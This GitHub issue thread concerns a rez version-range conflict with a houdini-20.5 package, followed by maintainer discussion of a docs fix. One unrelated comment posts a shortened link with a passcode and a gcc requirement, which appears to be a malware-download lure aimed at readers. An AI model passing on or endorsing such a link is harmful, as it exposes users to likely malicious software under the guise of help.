### ISSUE TITLE
Weak Requirement Range Causes Conflict

### ISSUE THREAD

**Issue by Anti-Distinctlyminty** [AcademySoftwareFoundation/rez#1824]
The weak requirement `~houdini-19+<=20.5` causes a conflict when using the package `houdini-20.5`.

I thought that by default if a minor/patch version is not specified, then it means "all are ok". But this appears to not be the case.

**Environment**
* OS Windows 10
* Rez version 2.112.0
* Rez python version 3.9.13

**To Reproduce**
1. Create two packages, one defining `houdini-20.5`, the other with the requirement `~houdini-19+<=20.5`.
2. Attempt a `rez-env`

**Expected behavior**
`houdini-20.5` should be accepted by the requirement `~houdini-19+<=20.5`.

**Actual behavior**
![image](https://github.com/user-attachments/assets/349bf8c3-2636-42cc-ac63-5f24af1e65d4)

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by Anti-Distinctlyminty** [comment]
Fair enough. Might be a point for the docs, unless I'm the only one who was caught out by this :)

**Comment by JeanChristopheMorinPerso** [comment]
Sure thing @Anti-Distinctlyminty. Would you like to submit a pull request to improve our docs in that area?

**Comment by Anti-Distinctlyminty** [comment]
Absolutely. I'll add it to my todo list :)

**Comment by AHB102** [comment]
@Anti-Distinctlyminty Would you like to proceed with a PR, or should I close this issue?

**Comment by Anti-Distinctlyminty** [comment]
It is on my todo list. I would like to contontribute.

**Comment by Anti-Distinctlyminty** [comment]
> @Anti-Distinctlyminty Would you like to proceed with a PR, or should I close this issue?

I think you can close as Sarah's PR addresses it.
